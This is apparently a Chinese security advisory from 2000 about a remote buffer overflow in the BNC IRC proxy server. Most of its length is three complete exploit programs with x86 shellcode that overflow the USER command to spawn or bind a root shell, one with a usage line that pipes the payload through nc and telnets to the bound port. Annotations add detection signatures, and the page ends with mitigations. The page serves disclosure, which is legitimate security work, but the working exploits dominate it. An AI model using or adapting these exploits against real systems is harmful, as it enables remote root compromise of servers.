
安全漏洞
BNC IRC 代理服务器缓冲区溢出漏洞

发布日期:2000-01-25
更新日期:2000-01-28

受影响系统:
BNC IRC Proxy Server 2.4.4 及以下版本
描述:

    BNC IRC代理服务器是一个可代理IRC会话的简单程序。攻击者利用其中的一个缓冲区溢出漏洞可在选中的主机上获得root权限。下文第一、第三个测试程序均把溢出数据放在超长的 USER 命令参数中发送。




测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


/* ============================================================== */

/*

bnc remote buffer overflow for linux x86 (w/o stack-non-exec patch)
by duke (duke@viper.net.au)
works on versions < 2.4.4

offsets: slackware: 0 redhat: 400->1000
special thanks to stranJer! :)

greets to everyone (plaguez, horiz0n, dpr, kod, f1ex, sewid, antilove,
tewl, dmess0r, stranJer , all of #!ADM :) and everyone at el8.org )

*/

#include <stdio.h>
#include <string.h>

/*
 * Layout constants for the generated buffer (used only by main() below):
 *   RET     - base 32-bit value that main() repeats through the tail of the
 *             buffer; the optional argv[1] offset is added to it.
 *             NOTE(review): presumably a guessed stack address in the target
 *             bnc process on Linux x86 (the header lists per-distribution
 *             offsets); this cannot be verified from the listing alone.
 *   BUFSIZE - total size in bytes of the buffer that is printed.
 *   LEN     - index where the payload ends and the repeated value begins.
 */
#define RET 0xbffff814
#define BUFSIZE 2000
#define LEN 1000


/*
 * Opaque machine-code payload, copied verbatim into the buffer by main().
 * The only human-readable part is the trailing "/bin/sh" path. main()
 * measures it with strlen(), i.e. it is handled as a NUL-terminated string.
 * NOTE(review): not disassembled for this review; presumably it starts a
 * shell inside the bnc process, which is the impact the advisory describes.
 * For defenders: the byte sequence is static, so it can serve as a content
 * signature for traffic sent to a bnc listener.
 */
char shellcode[] =
"\x33\xdb\x33\xc0\xb0\x29\xcd\x80\x33\xc0\xb0\x29\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

/*
 * Proof-of-concept generator: builds one oversized IRC "USER " line in a
 * local buffer and writes it to stdout. It performs no network I/O itself.
 *
 * argv[1] (optional) is an integer offset added to RET; with any other
 * argument count the offset is 0.
 *
 * What the output looks like on the wire (useful for detection): a single
 * "USER " line of roughly BUFSIZE bytes, consisting of a long run of 0x90
 * bytes, the static payload, and then the same 4-byte value repeated to the
 * end. RFC 1459 limits an IRC message to 512 bytes, so a USER line of this
 * size is never legitimate and can be rejected or alerted on by length alone.
 */
void
main (int argc, char **argv)
{
char buf[BUFSIZE];
/* sockfd is declared but never used anywhere in this function. */
int sockfd, i, offset;
if (argc == 2)
{
offset = atoi (argv[1]);
}
else
{
offset = 0;
}
/* Start with the whole buffer set to 0x90. */
memset (buf, '\x90', BUFSIZE);
/* Overwrite the tail, from index LEN upward, with RET + offset stored as a
   long at every fourth byte. */
for (i = LEN; i < BUFSIZE - 4; i += 4)
*(long *) &buf[i] = RET + offset;
/* Place the payload so that its last byte sits immediately before index
   LEN. */
memcpy (buf + (LEN - strlen (shellcode)), shellcode, strlen
(shellcode));
/* The first five bytes become the IRC command name, so everything after
   them is the command's argument. */
memcpy (buf, "USER ", 5);
printf ("%s", buf);
}

/* ============================================================== */

/*
Remote exploit example for bnc (Irc Proxy v2.2.4 by James Seter)
by duke (duke@viper.net.au)
32sep98 FreeBSD version by stran9er

Greet to
!@$@$A#%$#@!D%$#@!$#M@%%$@%c$!@$#!r!%$@e@$!#$#%w$@#$@#!!!#@$#$%
*/

#include <stdio.h>
#include <string.h>
#include <sys/types.h>

/*
 * Layout constants for the generated buffer (used only by main() below).
 * The header comment identifies this listing as the FreeBSD variant.
 *   ADDR        - starting value of the 32-bit word main() writes near the
 *                 end of the buffer; the optional argv[1] is added to it.
 *                 NOTE(review): presumably a guessed stack address in the
 *                 target process; not verifiable from the listing.
 *   RETPTR      - index at which that word is written.
 *   BUFSIZE     - number of bytes filled before the terminating NUL.
 *   SHELLOFFSET - extra distance subtracted when positioning the payload
 *                 ahead of RETPTR.
 */
#define ADDR 0xefbfd907
#define RETPTR 1036
#define BUFSIZE 1041
#define SHELLOFFSET 23

/*
 * Opaque machine-code payload, copied verbatim into the buffer by main().
 * The author's own comments split it into a prefix described as
 * "dup(0);dup(0)" and a part described as generic shellcode; the literal
 * "/bin/sh" is the only human-readable portion.
 * NOTE(review): not disassembled for this review. For defenders: the bytes
 * are static and can serve as a content signature.
 */
char shellcode[] =
/* added by me dup(0);dup(0) */
"\xEB\x0B\\\x9Axxx\\\x07x\xC3\xEB\x05\xE8\xF9\377\377\377"
"\x5E\x33\xDb\x89\x5e\xF2\x88\x5e\xF7\x31\xC0\xB0\x29\x53"
"\xE8\xDE\xFF\xFF\xFF\x33\xC0\xB0\x29\xE8\xD5\xFF\xFF\xFF"
/* generic shellcode */
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

/*
 * Proof-of-concept generator: fills a local buffer, then writes it to stdout
 * followed by three plain-text command lines. It performs no network I/O
 * itself; the address in use is reported on stderr.
 *
 * argv[1] (optional) is an integer added to ADDR.
 *
 * Unlike the other two listings on this page, no "USER " prefix is added
 * here. For detection: the output is a line of about BUFSIZE bytes (well
 * over the 512-byte IRC message limit of RFC 1459), mostly 0x90, followed
 * immediately by the literal text "/usr/bin/uname -a", "/usr/bin/id" and
 * "/bin/pwd" on separate lines. Those strings arriving on an IRC proxy port
 * are a strong indicator.
 */
void main (int argc, char **argv)
{
/* Five bytes larger than BUFSIZE, leaving room for the NUL stored at index
   BUFSIZE below. */
char buf[BUFSIZE+5];
unsigned long int addr = ADDR;
int i;

if (argc > 1) addr += atoi (argv[1]);
fprintf (stderr, "Using address: 0x%X\n", addr);

/* Start with the first BUFSIZE bytes set to 0x90. */
memset (buf, 0x90, BUFSIZE);
/* With RETPTR = 1036 and BUFSIZE = 1041 the condition holds only for
   i = 1036, so addr is stored exactly once, as a long at index RETPTR. */
for (i = RETPTR; i < BUFSIZE - 4; i += 4)
*(long *) &buf[i] = addr;
/* Position the payload ahead of RETPTR. The start is computed with
   sizeof (which counts the terminating NUL) while the copy length uses
   strlen, and SHELLOFFSET moves it further back. */
memcpy (buf + (RETPTR - sizeof(shellcode)) - SHELLOFFSET,
shellcode, strlen (shellcode));
/* Terminate the string so the %s below stops at index BUFSIZE. */
buf[BUFSIZE]=0;
printf ("%s/usr/bin/uname -a\n/usr/bin/id\n/bin/pwd\n", buf);
}
/* segodna: 23 sentabra 1998 goda */

/* ============================================================== */

/*
* SDI irc bouncer exploit
*
* This source exploits a buffer overflow in the bnc,
* popular irc bouncer, binding a shell.
*
* Tested against bnc 2.2.4 running on linux.
*
* usage:
* lame:~# gcc SDI-bnc.c -o SDI-bnc
*
* lame:~# (SDI-bnc 0; cat) | nc www.lame.org 666
* `-> offset, zero in most cases
*
* lame:~# telnet www.lame.org 10752
*
*
* by jamez and dumped from sekure SDI (www.sekure.org)
*
* email: securecode@sekure.org
*
* merry christmas and happy 1999 ;)
*
*/

/* c0nd0r :* */
/*
 * Opaque machine-code payload, copied verbatim into the output buffer by
 * main(). The file header describes it as binding a shell, and the header's
 * usage example follows up with a connection to TCP port 10752.
 * NOTE(review): not disassembled for this review; the port is taken from
 * the header, not derived from the bytes.
 *
 * For defenders: the final 14 bytes are the ASCII text "Privet ADMcrew",
 * a convenient static signature. An unexpected listener on TCP 10752 on a
 * host that runs bnc is a compromise indicator consistent with this header.
 */
char bindcode[] =
"\x33\xDB\x33\xC0\xB0\x1B\xCD\x80\x33\xD2\x33\xc0\x8b\xDA\xb0\x06"
"\xcd\x80\xfe\xc2\x75\xf4\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x62"
"\xeb\x62\x5e\x56\xac\x3c\xfd\x74\x06\xfe\xc0\x74\x0b\xeb\xf5\xb0"
"\x30\xfe\xc8\x88\x46\xff\xeb\xec\x5e\xb0\x02\x89\x06\xfe\xc8\x89"
"\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\x31\xdb\xfe\xc3\x89\xf1\xcd"
"\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\x2a\x66\x89\x46\x0e\x8d"
"\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0"
"\x66\xfe\xc3\xcd\x80\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04\xcd\x80\xeb\x04"
"\xeb\x4c\xeb\x52\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xfe\xc3\xcd\x80"
"\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xb0\x3f\xfe\xc1"
"\xcd\x80\xb8\x2e\x62\x69\x6e\x40\x89\x06\xb8\x2e\x73\x68\x21\x40\x89\x46"
"\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e"
"\x08\x8d\x56\x0c\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x45\xff\xff"
"\xff\xFF\xFD\xFF\x50\x72\x69\x76\x65\x74\x20\x41\x44\x4D\x63\x72\x65\x77";

/* SIZE is the length in bytes of the output buffer; NOP is the filler byte
   main() writes into its first third. */
#define SIZE 1600
#define NOP 0x90

/* File-scope output buffer that main() fills and then prints as the argument
   of a USER command. */
char buffer[SIZE];

/*
 * Proof-of-concept generator: fills the global buffer and writes it to
 * stdout as "USER <buffer>\n". It performs no network I/O itself.
 *
 * argv[1] (optional) is an integer offset added to the hard-coded base
 * address; the header comment says zero works in most cases.
 *
 * For detection: the result is one USER line of about SIZE bytes, i.e. a
 * run of 0x90 bytes, the static bindcode payload, then one 4-byte value
 * repeated to the end. RFC 1459 limits an IRC message to 512 bytes, so a
 * USER line of this size can be rejected or alerted on by length alone.
 */
void main(int argc, char * argv[])
{
int i, x, offset = 0;
long addr;

if(argc > 1) offset = atoi(argv[1]);

/* NOTE(review): presumably a guessed stack address in the target process on
   Linux x86 (the header says it was tested on Linux); not verifiable from
   the listing. */
addr = 0xbffff6ff + offset; /* evil addr */

/* First SIZE/3 bytes (533 with integer division) are the filler byte. */
for(i = 0; i < SIZE/3; i++)
buffer[i] = NOP;

/* The payload follows directly; i keeps advancing so the next loop resumes
   where the payload ends. */
for(x = 0; x < strlen(bindcode); i++, x++)
buffer[i] = bindcode[x];

/* The remainder is addr repeated, written one byte at a time with the least
   significant byte first. */
for (; i < SIZE; i += 4)
{
buffer[i ] = addr & 0x000000ff;
buffer[i+1] = (addr & 0x0000ff00) >> 8;
buffer[i+2] = (addr & 0x00ff0000) >> 16;
buffer[i+3] = (addr & 0xff000000) >> 24;
}

/* The last byte becomes the string terminator for the %s below. */
buffer[SIZE - 1] = 0;

printf("USER %s\n", buffer);

}



建议:

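    暂无。请等待新版本或补丁程序。在补丁发布之前,可考虑以下临时缓解措施:用防火墙或访问控制将 bnc 监听端口限制为仅允许可信来源地址连接;以专用的低权限账户而不是 root 运行 bnc;不需要该服务时将其停用。另外,上文第一个测试程序的注释注明它针对未打栈不可执行补丁的 Linux x86 系统,启用此类补丁可增加利用难度,但不能替代修复。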



本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载